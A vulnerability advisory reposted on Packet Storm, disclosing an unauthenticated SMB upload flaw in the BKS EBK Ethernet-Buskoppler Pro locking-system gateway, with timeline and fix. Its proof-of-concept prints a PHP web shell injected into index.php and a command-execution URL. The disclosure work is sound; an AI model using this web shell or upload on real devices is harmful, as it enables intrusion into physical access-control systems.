what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

BKS EBK Ethernet-Buskoppler Pro Shell Upload

BKS EBK Ethernet-Buskoppler Pro Shell Upload
Posted Jul 3, 2019
Authored by Sebastian Auwaerter | Site syss.de

BKS EBK Ethernet-Buskoppler Pro versions prior to 3.01 suffer from a remote shell upload vulnerability.

tags | exploit, remote, shell
advisories | CVE-2019-12971
SHA-256 | 34bbdc615e014059e3b04c9185a7fd91f2ae36a5796c871aaa3b732608c44564

BKS EBK Ethernet-Buskoppler Pro Shell Upload

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-017
Product: BKS EBK Ethernet-Buskoppler Pro
Manufacturer: BKS GmbH
Affected Version(s): < 3.01
Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: April 23, 2019
Solution Date: June 14, 2019
Public Disclosure: July 03, 2019
CVE Reference: CVE-2019-12971
Author of Advisory: Sebastian Auwaerter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The "EBK Ethernet-Buskoppler Pro" appliance provided by BKS GmbH is a
gateway to communicate with the access terminals of BKS locking systems.
The appliance is generally attached to a company's IP-based network and
communicates with the locking systems via a proprietary bus system.

Due to an unauthenticated upload functionality through Samba, the BKS
Ethernet-Buskoppler Pro is vulnerable to remote code execution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

An unauthenticated attacker can connect to an Ethernet-Buskoppler Pro
using any client that supports uploading files via SMB (e.g. smbclient,
Nautilus, Windows Explorer) and overwrite files located in the web root
directory of the appliance. After adding a web shell to any of the
existing PHP scripts, the attacker can execute it by accessing the
edited script via the web server listening on the TCP port 443.

According to BKS, only Appliances based on a Raspberry Pi 3 are affected
since the vulnerability has been introduced during an upgrade from
Raspberry Pi 2 to 3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

As proof-of-concept, the file index.php can be altered via SMB
(e.g. gedit smb://<VULNERABLE_HOST>/webinterface/index.php) to allow a
web shell in the context of the user account www-data:

- ----------------
index.php:
<?php

if ($_REQUEST['pw'] === "very-secure-password"){
system($_REQUEST['cmd']);
}
set_include_path('/var/www/ebkpro_website');
include 'include/debug.php';
[...]
- ----------------

The web shell can then be used to execute commands by navigating to the
following URL:

http://<VULNERABLE_HOST>:80/index.php?pw=very-secure-password&cmd=<COMMAND>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

BKS provides update packages for the EBK Ethernet-Buskoppler. The updater
in version 1.2.1.2 contains firmware version 3.01 which fixes the
vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-04-10: Vulnerability discovered
2019-04-23: Vulnerability reported to manufacturer
2019-06-14: Patch released by manufacturer
2019-07-03: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] SySS Security Advisory SYSS-2019-017
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-017.txt
[2] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Auwaerter of SySS
GmbH.

E-Mail: sebastian.auwaerter@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE+Yw+EmcTGdmeL74+6aMNSOLwqLYFAl0bAL4ACgkQ6aMNSOLw
qLZv5xAAmcFcqsdPSPdqFNAJyBNIfKr0scJo/j1jtZLWE7rW/Z9j3WHLpaOEuir9
n6K1NkMnidA1MxSnagwbYH4c4DDjINhucN93U8r4kZ0NIBbvXIzso2Jq0f/2rl2h
GxADzm7d2Z35zNL4CLsqQ6t/ufE9tluLx8kGPEeGkZ/6rZa+ie6MsMyiy6cdccGr
Fxk1/vWaWLHE3qTSJb8Zz+72nBl4GmZvNlGmBkIIw9/xu0A2DyepZsSv3Uzvh43j
fTHs+vpldq+BZ3PLb8ugJmIgK0JrLKyvnCf4TgmZ2XZ1vNtcRtMnwhy6QB6aherc
s+M9KYWI2UfF6VX5P0dr2hLdPFrmoCg5QKJrbK3P8bVYWuYdm9sWuCaeE0qYrk9a
Q7ohGI9F9HTZJBeQVfN0LQVINrHOXqZ9e1yMULtEUHyJCo3RQko98Dx0THv6lSDO
6a5Hl4UlqyOupbZDOdzmEnoZdCEHd8NgiA2ozCmyvD5bfQcqDyeZDq//IJJXv5d5
KB96twyuYR+PkmcJP89zBREbs0+v4aPXE50yFFAqhDwHfKs8cvQC+t+VqMEN2SFd
IOFjBl9oXcu+2bmgcJ8Ob0Qli2FPP7JF0ern+5pLLp1zGBR+QneKPNqVGCNfciAL
1T7Db1u1HE9cmSit5gaqLMPodqmXyifqDRfj9fK1obgPx01GFLY=
=JGkX
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close